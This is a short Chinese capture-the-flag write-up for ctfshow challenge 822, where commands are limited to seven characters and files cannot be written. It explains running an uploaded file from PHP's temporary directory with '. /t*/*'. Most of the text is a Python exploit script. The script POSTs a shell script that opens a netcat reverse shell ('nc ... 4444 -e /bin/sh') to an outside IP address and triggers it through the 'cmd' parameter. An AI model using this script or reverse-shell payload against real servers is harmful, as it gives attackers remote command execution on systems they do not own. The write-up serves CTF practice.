ctfshow822(7字符文件不可写)

代码还是那个代码，这次没有写文件的权限了。这次思路是：我们先POST一个文件，然后执行php临时文件目录下的我们上传的文件即可。

该文件一般存放在/tmp/??????下。

脚本如下：

import requests
import time

url = "http://98985a2d-d3a6-4710-b157-9b616492cbe1.challenge.ctf.show/"


def getShell(payload):
	data={
	"cmd":payload
	}
	file = {
	"file":"#!/bin/sh\nnc 43.143.162.227 4444 -e /bin/sh"
	}
	requests.post(url,data=data,files=file)
	print("[*] Attack success!!!")

def run():
	getShell(". /t*/*")

def main():
	run()
	
if __name__ == '__main__':
	main()

同样的极限在. /t*/*